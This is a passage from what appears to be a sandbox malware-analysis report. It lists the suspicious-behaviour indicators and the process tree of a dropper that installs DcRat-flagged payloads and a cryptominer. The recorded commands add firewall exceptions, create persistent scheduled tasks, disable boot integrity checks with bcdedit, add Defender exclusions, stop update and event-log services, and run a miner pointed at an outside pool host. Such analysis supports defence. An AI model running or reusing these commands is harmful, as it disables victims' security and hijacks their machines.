pid Process 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 1744 Hz5DKFVHt5wmDrYd00peGwos.exe 1744 Hz5DKFVHt5wmDrYd00peGwos.exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1972 BHyvkIgo1eAG39KMFmpK1JKB.exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 1208 Process not Found 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 1208 Process not Found 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1208 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 480 Process not Found -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1744 Hz5DKFVHt5wmDrYd00peGwos.exe 2480 vgtejgi 336 RuIUvkS8wVfymaAK7lF9BY8u.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 1260 AddInProcess32.exe Token: SeDebugPrivilege 1972 BHyvkIgo1eAG39KMFmpK1JKB.exe Token: SeImpersonatePrivilege 1972 BHyvkIgo1eAG39KMFmpK1JKB.exe Token: SeShutdownPrivilege 1208 Process not Found Token: SeSystemEnvironmentPrivilege 2064 csrss.exe Token: SeSecurityPrivilege 1892 sc.exe Token: SeSecurityPrivilege 1892 sc.exe Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeDebugPrivilege 1636 powershell.exe Token: SeShutdownPrivilege 336 powercfg.exe Token: SeShutdownPrivilege 1716 powercfg.exe Token: SeShutdownPrivilege 656 powercfg.exe Token: SeShutdownPrivilege 2408 powercfg.exe Token: SeDebugPrivilege 684 powershell.exe Token: SeShutdownPrivilege 876 powercfg.exe Token: SeShutdownPrivilege 1828 powercfg.exe Token: SeShutdownPrivilege 928 powercfg.exe Token: SeShutdownPrivilege 1816 powercfg.exe Token: SeLockMemoryPrivilege 2460 explorer.exe Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 1644 wz8VvURJ6HobiJci3zt7FzSf.tmp -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2656 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1260 2528 file.exe 28 PID 2528 wrote to memory of 1748 2528 file.exe 29 PID 2528 wrote to memory of 1748 2528 file.exe 29 PID 2528 wrote to memory of 1748 2528 file.exe 29 PID 2528 wrote to memory of 1748 2528 file.exe 29 PID 1260 wrote to memory of 1744 1260 AddInProcess32.exe 30 PID 1260 wrote to memory of 1744 1260 AddInProcess32.exe 30 PID 1260 wrote to memory of 1744 1260 AddInProcess32.exe 30 PID 1260 wrote to memory of 1744 1260 AddInProcess32.exe 30 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 1260 wrote to memory of 2884 1260 AddInProcess32.exe 31 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 2884 wrote to memory of 3008 2884 DUxkNmj5MiGf8BNoRKpbAk7D.exe 32 PID 1260 wrote to memory of 1972 1260 AddInProcess32.exe 33 PID 1260 wrote to memory of 1972 1260 AddInProcess32.exe 33 PID 1260 wrote to memory of 1972 1260 AddInProcess32.exe 33 PID 1260 wrote to memory of 1972 1260 AddInProcess32.exe 33 PID 3008 wrote to memory of 2304 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 38 PID 3008 wrote to memory of 2304 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 38 PID 3008 wrote to memory of 2304 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 38 PID 3008 wrote to memory of 2304 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 38 PID 1260 wrote to memory of 1108 1260 AddInProcess32.exe 39 PID 1260 wrote to memory of 1108 1260 AddInProcess32.exe 39 PID 1260 wrote to memory of 1108 1260 AddInProcess32.exe 39 PID 1260 wrote to memory of 1108 1260 AddInProcess32.exe 39 PID 1108 wrote to memory of 992 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 40 PID 1108 wrote to memory of 992 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 40 PID 1108 wrote to memory of 992 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 40 PID 1108 wrote to memory of 992 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 40 PID 3008 wrote to memory of 448 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 41 PID 3008 wrote to memory of 448 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 41 PID 3008 wrote to memory of 448 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 41 PID 3008 wrote to memory of 448 3008 DUxkNmj5MiGf8BNoRKpbAk7D.tmp 41 PID 832 wrote to memory of 1336 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 45 PID 832 wrote to memory of 1336 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 45 PID 832 wrote to memory of 1336 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 45 PID 832 wrote to memory of 1336 832 BHyvkIgo1eAG39KMFmpK1JKB.exe 45 PID 1336 wrote to memory of 2924 1336 cmd.exe 47 PID 1336 wrote to memory of 2924 1336 cmd.exe 47 PID 1336 wrote to memory of 2924 1336 cmd.exe 47 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 PID 1108 wrote to memory of 2656 1108 ua7PBRa40qlB8cRQTFxvJuWK.exe 48 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"2⤵
- DcRat
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1260 -
C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe"C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1744
-
-
C:\Users\Admin\Pictures\DUxkNmj5MiGf8BNoRKpbAk7D.exe"C:\Users\Admin\Pictures\DUxkNmj5MiGf8BNoRKpbAk7D.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Users\Admin\AppData\Local\Temp\is-G37C5.tmp\DUxkNmj5MiGf8BNoRKpbAk7D.tmp"C:\Users\Admin\AppData\Local\Temp\is-G37C5.tmp\DUxkNmj5MiGf8BNoRKpbAk7D.tmp" /SL5="$5015A,1697450,56832,C:\Users\Admin\Pictures\DUxkNmj5MiGf8BNoRKpbAk7D.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i5⤵
- Executes dropped EXE
PID:2304
-
-
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s5⤵
- Executes dropped EXE
PID:448
-
-
-
-
C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe"C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972 -
C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe"C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe"4⤵
- DcRat
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:2924
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2064 -
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:316
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:1780
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1956 -
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER7⤵
- Modifies boot configuration data using bcdedit
PID:2596
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:1396
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:7⤵
- Modifies boot configuration data using bcdedit
PID:1948
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows7⤵
- Modifies boot configuration data using bcdedit
PID:3020
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe7⤵
- Modifies boot configuration data using bcdedit
PID:2332
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe7⤵
- Modifies boot configuration data using bcdedit
PID:2128
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 07⤵
- Modifies boot configuration data using bcdedit
PID:2280
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn7⤵
- Modifies boot configuration data using bcdedit
PID:2540
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 17⤵
- Modifies boot configuration data using bcdedit
PID:2120
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}7⤵
- Modifies boot configuration data using bcdedit
PID:2408
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast7⤵
- Modifies boot configuration data using bcdedit
PID:888
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 07⤵
- Modifies boot configuration data using bcdedit
PID:2932
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}7⤵
- Modifies boot configuration data using bcdedit
PID:2652
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:1248
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
PID:2132
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe6⤵
- Executes dropped EXE
PID:2012
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:1540
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:1756 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:2868
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:2680
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exeC:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:806⤵PID:2812
-
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exeC:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 234c6d18-3256-488e-b465-c4f656ececdc --tls --nicehash -o showlock.net:443 --rig-id 234c6d18-3256-488e-b465-c4f656ececdc --tls --nicehash -o showlock.net:80 --rig-id 234c6d18-3256-488e-b465-c4f656ececdc --nicehash --http-port 3433 --http-access-token 234c6d18-3256-488e-b465-c4f656ececdc --randomx-wrmsr=-17⤵PID:1960
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe -hide 19607⤵PID:1560
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exeC:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe6⤵PID:2492
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exeC:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe6⤵PID:1968
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:604
-
-
-
-
-
C:\Users\Admin\Pictures\ua7PBRa40qlB8cRQTFxvJuWK.exe"C:\Users\Admin\Pictures\ua7PBRa40qlB8cRQTFxvJuWK.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:992
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2656 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:3040
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:2524
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:2856
-
-
-
-
-
C:\Users\Admin\Pictures\PHZUeKsym6c4ao1N4lAzfMjT.exe"C:\Users\Admin\Pictures\PHZUeKsym6c4ao1N4lAzfMjT.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
PID:2236 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2312
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
- Drops file in Windows directory
PID:1052
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1152
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2400
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1784
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:2084
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:2208
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:336
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:656
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:2044
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"4⤵
- Launches sc.exe
PID:2636
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:2032
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:2900
-
-
-
C:\Users\Admin\Pictures\GHuvLZsqsmCMoGgf6n6VLvxo.exe"C:\Users\Admin\Pictures\GHuvLZsqsmCMoGgf6n6VLvxo.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1892 -
C:\Users\Admin\AppData\Local\Temp\syncUpd.exeC:\Users\Admin\AppData\Local\Temp\syncUpd.exe4⤵
- Executes dropped EXE
PID:1624
-
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe4⤵PID:2904
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:2236
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:3016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- DcRat
- Creates scheduled task(s)
PID:2216
-
-
-
-
-
C:\Users\Admin\Pictures\RuIUvkS8wVfymaAK7lF9BY8u.exe"C:\Users\Admin\Pictures\RuIUvkS8wVfymaAK7lF9BY8u.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:336
-
-
C:\Users\Admin\Pictures\wz8VvURJ6HobiJci3zt7FzSf.exe"C:\Users\Admin\Pictures\wz8VvURJ6HobiJci3zt7FzSf.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2224 -
C:\Users\Admin\AppData\Local\Temp\is-5PL38.tmp\wz8VvURJ6HobiJci3zt7FzSf.tmp"C:\Users\Admin\AppData\Local\Temp\is-5PL38.tmp\wz8VvURJ6HobiJci3zt7FzSf.tmp" /SL5="$60178,1697450,56832,C:\Users\Admin\Pictures\wz8VvURJ6HobiJci3zt7FzSf.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1644 -
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i5⤵PID:3064
-
-
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s5⤵PID:412
-
-
-
-
C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe"C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe"3⤵
- Executes dropped EXE
PID:1000 -
C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe"C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe"4⤵PID:2032
-
-
-
C:\Users\Admin\Pictures\ZKgWpaIq4ixsfKfSjBJZNp2s.exe"C:\Users\Admin\Pictures\ZKgWpaIq4ixsfKfSjBJZNp2s.exe"3⤵PID:2192
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵PID:2340
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2488
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2996
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1200
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2532
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1872
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:2144
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:3012
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵PID:1252
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵PID:1416
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵PID:1568
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵PID:1668
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:1928
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"4⤵
- Launches sc.exe
PID:1864
-
-
-
C:\Users\Admin\Pictures\MWZ0UpCReh4UDpqFe8lrwVHo.exe"C:\Users\Admin\Pictures\MWZ0UpCReh4UDpqFe8lrwVHo.exe"3⤵PID:2348
-
C:\Users\Admin\AppData\Local\Temp\is-6RKA3.tmp\MWZ0UpCReh4UDpqFe8lrwVHo.tmp"C:\Users\Admin\AppData\Local\Temp\is-6RKA3.tmp\MWZ0UpCReh4UDpqFe8lrwVHo.tmp" /SL5="$60210,1697450,56832,C:\Users\Admin\Pictures\MWZ0UpCReh4UDpqFe8lrwVHo.exe"4⤵PID:2720
-
-
-
C:\Users\Admin\Pictures\Jp275Dhuhpnf32gtIbZFsj8s.exe"C:\Users\Admin\Pictures\Jp275Dhuhpnf32gtIbZFsj8s.exe"3⤵PID:1064
-
-
C:\Users\Admin\Pictures\fO1T1qPAwM5rbuoMSDKChoT7.exe"C:\Users\Admin\Pictures\fO1T1qPAwM5rbuoMSDKChoT7.exe"3⤵PID:2108
-
-
